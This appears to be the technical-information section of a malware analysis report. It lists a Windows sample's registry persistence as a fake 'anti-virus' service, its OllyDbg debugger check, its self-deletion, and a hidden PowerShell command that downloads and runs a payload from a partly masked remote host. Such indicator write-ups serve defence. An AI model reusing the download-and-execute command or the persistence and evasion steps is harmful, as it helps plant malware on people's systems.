Technical Information
- [<HKLM>\System\CurrentControlSet\Services\anti-virus] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\anti-virus] 'ImagePath' = '%ProgramFiles(x86)%\module.pif'
- 'anti-virus' %ProgramFiles(x86)%\module.pif
- http://ha###.502ok.com/hm as c:/windows/inf/svch.exe
- ClassName: 'OLLYDBG', WindowName: ''
- %ProgramFiles(x86)%\module.pif
- %ProgramFiles(x86)%\module.pif
- 'localhost':8000
- DNS ASK ha###.502ok.com
- '%ProgramFiles(x86)%\module.pif'
- '%ProgramFiles(x86)%\module.pif' Win7
- '%WINDIR%\syswow64\cmd.exe' /c del <Full path to file> > nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://ha###.502ok.com/hm','C:/WINDOWS/inf/svch.exe');start-process C:/W...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c del <Full path to file> > nul
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://ha###.502ok.com/hm','C:/WINDOWS/inf/svch.exe');start-process C:/W...